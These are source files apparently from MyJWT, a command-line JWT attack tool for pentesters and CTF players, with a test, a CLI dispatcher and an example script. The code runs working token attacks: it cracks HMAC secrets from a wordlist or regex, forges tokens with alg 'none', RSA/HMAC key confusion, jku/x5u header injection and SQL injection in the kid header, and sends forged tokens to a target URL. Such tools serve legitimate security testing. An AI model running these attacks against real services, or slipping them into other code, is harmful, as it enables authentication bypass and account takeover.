def test_bruteforce_wordlist():
    """
    Check bruteforce_wordlist (vulnerabilities.py) on its three outcomes:
    malformed token, secret present in the wordlist, secret absent.
    """
    # An empty string is not a JWT and is expected to raise InvalidJWT.
    with pytest.raises(InvalidJWT):
        bruteforce_wordlist("", password_path)

    # The fixture token's secret is expected to be in the fixture wordlist.
    recovered = bruteforce_wordlist(jwt_bruteforce, password_path)
    assert recovered == key

    # Failure is reported as an empty string, not as an exception.
    # presumably ./wordlist/empty.txt holds no candidates; confirm against the fixture.
    missed = bruteforce_wordlist(jwt_bruteforce, "./wordlist/empty.txt")
    assert missed == ""
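def user_bruteforce_wordlist(jwt_json: Dict, wordlist: str) -> None:
    """
    Run a wordlist search for the token's HMAC secret and print the outcome.

    Parameters
    ----------
    jwt_json: Dict
        your jwt json (use encode_to_json. Check Doc).
    wordlist: str
        path of your wordlist

    Notes
    -----
    A recovered key is copied to the clipboard and echoed to the terminal,
    so both should be treated as holding a live secret afterwards.
    """
    if "HS" not in jwt_json[HEADER]["alg"]:
        # Substring test on the header's alg value: anything without "HS" is
        # not HMAC-signed, so there is no shared secret to search for. Stop
        # after pointing at the docs instead of falling through into the
        # search; the command-line path exits on this same check.
        click.echo(CHECK_DOCS)
        return

    # Rebuild the compact token from its decoded parts before handing it over.
    token = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]
    key = bruteforce_wordlist(token, wordlist)

    # bruteforce_wordlist reports "no match" as an empty string.
    if key == "":
        click.echo(NOT_CRAKED)
    else:
        copy_to_clipboard(key)
        click.echo(CRACKED + key)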
def myjwt_cli(jwt, **kwargs):
    """
    \b
    This cli is for pentesters, CTF players, or dev.
    You can modify your jwt, sign, inject ,etc...
    Full documentation is at http://myjwt.readthedocs.io.
    If you see problems or enhancement send an issue.I will respond as soon as possible.
    Enjoy :)
    All new jwt will be copy to the clipboard.
    \f
    Parameters
    ----------
    jwt: str
        your jwt
    kwargs: Dict
        all option value
    """
    # NOTE: the docstring above is left word for word. Its \b and \f markers are
    # click help-formatting controls, so the text before \f is presumably shown to
    # users as the command help (the click decorators are outside this view).
    #
    # Overview: validate the token, then apply each requested option in a fixed
    # order. `jwt` is rebound as options rewrite the token, so later options see
    # the output of earlier ones. Most branches copy their result to the clipboard
    # and echo it; several end the process with sys.exit.

    # Refuse to work on input that is not a well-formed JWT.
    if not is_valid_jwt(jwt):
        sys.exit(NOT_VALID_JWT)

    # Interactive mode is chosen only when no option carries a value: every
    # option must be None, an empty tuple, falsy, or the string "GET"
    # (presumably the default of the method option; confirm at the decorator).
    interface_mode = True
    for option in kwargs.values():
        if not (option is None or option == () or not option or option == "GET"):
            interface_mode = False
    if interface_mode:
        user_interface(jwt)
        sys.exit()

    # --- bruteforce: wordlist search for the HMAC secret ---------------------
    if kwargs["bruteforce"]:
        jwt_json = jwt_to_json(jwt)
        # Substring test: only alg values containing "HS" are accepted here.
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        # kwargs["bruteforce"] is passed as the wordlist argument.
        key = bruteforce_wordlist(jwt, kwargs["bruteforce"])
        if key == "":
            # Empty string is the "no candidate matched" result.
            sys.exit(NOT_CRAKED)
        else:
            # The recovered secret lands on the clipboard and on stdout.
            copy_to_clipboard(key)
            click.echo(CRACKED + key)
            # Stop here unless a header/payload edit was requested as well.
            if (
                not kwargs["add_header"]
                and not kwargs["add_payload"]
                and not kwargs["full_payload"]
            ):
                sys.exit()

    # --- add_payload: merge name=value pairs into the payload ----------------
    if kwargs["add_payload"]:
        payload_dict = dict()
        for payload in kwargs["add_payload"]:
            # The split must yield exactly two parts, so an item without "=" or
            # with a value that itself contains "=" is rejected.
            new_str = payload.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_PAYLOAD)
            payload_dict[new_str[0]] = new_str[1]
        jwt_json = add_payload(jwt_to_json(jwt), payload_dict)
        # Re-attaches jwt_json[SIGNATURE] to the re-encoded header and payload.
        # NOTE(review): add_payload is not shown; if it leaves the signature
        # entry untouched, the token will not verify until it is re-signed.
        jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

    # --- add_header: same parsing rules, applied to the header ---------------
    if kwargs["add_header"]:
        header_dict = dict()
        for header in kwargs["add_header"]:
            new_str = header.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_HEADER)
            header_dict[new_str[0]] = new_str[1]
        jwt_json = add_header(jwt_to_json(jwt), header_dict)
        jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

    # --- full_payload: replace the payload with user-supplied JSON -----------
    if kwargs["full_payload"]:
        try:
            jwt_json = change_payload(
                jwt_to_json(jwt),
                json.loads(kwargs["full_payload"]),
            )
            jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]
        except JSONDecodeError:
            # Malformed JSON on the command line ends the run with a message.
            sys.exit(VALID_PAYLOAD_JSON)

    # --- x5u: delegate to x5u_vulnerability and emit the new token -----------
    if kwargs["x5u"]:
        jwt = x5u_vulnerability(
            jwt,
            url=kwargs["x5u"],
            pem=kwargs["key"],
            crt=kwargs["crt"],
            file=kwargs["file"],
        )
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)

    # --- jku: delegate to jku_vulnerability and emit the new token -----------
    if kwargs["jku"]:
        jwt = jku_vulnerability(
            jwt,
            kwargs["jku"],
            kwargs["file"],
            kwargs["key"],
        )
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
        # Reminder printed to the user; the jku value is interpolated verbatim.
        click.echo(
            f"Please run python -m http.server --bind {kwargs['jku']} .Before send your jwt",
        )

    # --- kid: rewrite the kid header via inject_sql_kid ----------------------
    if kwargs["kid"]:
        jwt = inject_sql_kid(jwt, kwargs["kid"])
        # When sign is also set, output is left to the sign branch below.
        # NOTE(review): "kid" is absent from the final fall-through condition,
        # so with only this option set the token is echoed here and again at
        # the end of the function.
        if not kwargs["sign"]:
            copy_to_clipboard(jwt)
            click.echo(NEW_JWT + jwt)

    # --- hmac: delegate to confusion_rsa_hmac and emit the new token ---------
    if kwargs["hmac"]:
        jwt = confusion_rsa_hmac(jwt, kwargs["hmac"])
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)

    # --- none_vulnerability: set alg to "none" -------------------------------
    if kwargs["none_vulnerability"]:
        jwt_json = change_alg(jwt_to_json(jwt), "none")
        # Trailing "." with nothing after it: the signature segment is empty.
        jwt = encode_jwt(jwt_json) + "."
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)

    # --- sign: sign the current token with the supplied key (HS only) --------
    if kwargs["sign"]:
        jwt_json = jwt_to_json(jwt)
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        jwt = signature(jwt_json, kwargs["sign"])
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)

    # --- verify: does the supplied key reproduce the token's signature? ------
    if kwargs["verify"]:
        jwt_json = jwt_to_json(jwt)
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        new_jwt = signature(jwt_json, kwargs["verify"])
        # Compare the third dot-separated segment (the signature) of both tokens.
        click.echo(
            VALID_SIGNATURE if new_jwt.split(".")[2] == jwt.split(".")[2] else INVALID_SIGNATURE,
        )

    # --- crack: try every string generated from a regex as the key -----------
    if kwargs["crack"]:
        jwt_json = jwt_to_json(jwt)
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        # The whole candidate set is built as a list before any key is tried,
        # which is what lets the count be printed and the progress bar sized.
        all_string = list(exrex.generate(kwargs["crack"]))
        click.echo(
            kwargs["crack"] + " have " + str(len(all_string)) + " possibilities",
        )
        with click.progressbar(
            all_string,
            label="Keys",
            length=len(all_string),
        ) as bar:
            for key in bar:
                new_jwt = signature(jwt_json, key)
                if new_jwt.split(".")[2] == jwt.split(".")[2]:
                    # First matching key wins; the process ends immediately.
                    copy_to_clipboard(key)
                    sys.exit("Key found: " + key)
        # Every candidate was tried without a match. This branch always exits.
        sys.exit(INVALID_SIGNATURE)

    # --- url: send the current token to a target URL -------------------------
    if kwargs["url"]:
        # Form data as name=value; the literal value "MY_JWT" is a placeholder
        # that is replaced by the current token.
        data_dict = dict()
        for d in kwargs["data"]:
            new_str = d.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_DATA)
            if new_str[1] == "MY_JWT":
                data_dict[new_str[0]] = jwt
            else:
                data_dict[new_str[0]] = new_str[1]
        # Cookies follow the same name=value and "MY_JWT" placeholder rules.
        cookies_dict = dict()
        for cookie in kwargs["cookies"]:
            new_str = cookie.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_COOKIES)
            if new_str[1] == "MY_JWT":
                cookies_dict[new_str[0]] = jwt
            else:
                cookies_dict[new_str[0]] = new_str[1]
        try:
            response = send_jwt_to_url(
                kwargs["url"],
                kwargs["method"],
                data_dict,
                cookies_dict,
                jwt,
            )
            # The response body is written to the terminal as received.
            click.echo(response.text)
        except requests.exceptions.ConnectionError:
            sys.exit("Connection Error. Verify your url.")

    # --- print: show the decoded token ---------------------------------------
    if kwargs["print"]:
        copy_to_clipboard(jwt)
        print_decoded(jwt)

    # Fall-through output: when none of the options listed below was used, emit
    # the token here so that header/payload edits still produce a result.
    if (
        not kwargs["none_vulnerability"]
        and not kwargs["hmac"]
        and not kwargs["bruteforce"]
        and not kwargs["sign"]
        and not kwargs["verify"]
        and not kwargs["jku"]
        and not kwargs["x5u"]
        and not kwargs["print"]
    ):
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
    sys.exit()
from myjwt.vulnerabilities import bruteforce_wordlist

# Sample HS256 token whose signing secret this example tries to recover.
#   Header:    {"typ": "JWT", "alg": "HS256"}
#   Payload:   {"user": null}
#   Signature: "Tr0VvdP6rVBGBGuI_luxGCOaz6BbhC6IxRTlKOW8UjM"
jwt = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjpudWxsfQ.Tr0VvdP6rVBGBGuI_luxGCOaz6BbhC6IxRTlKOW8UjM"

# Path to the dictionary file: plain text, one candidate password per line.
# The path is relative, so it resolves against the current working directory.
wordlist = "../../wordlist/common_pass.txt"

# Returns the secret key used for the signature, or "" when no entry matches.
# A secret that appears in a password list is the weakness on display here:
# HS256 keys should be random and at least as long as the hash output.
key = bruteforce_wordlist(jwt, wordlist)

# If a key comes back, the 03-sign-key script shows how to modify the token and
# re-sign it with that secret.
print(key)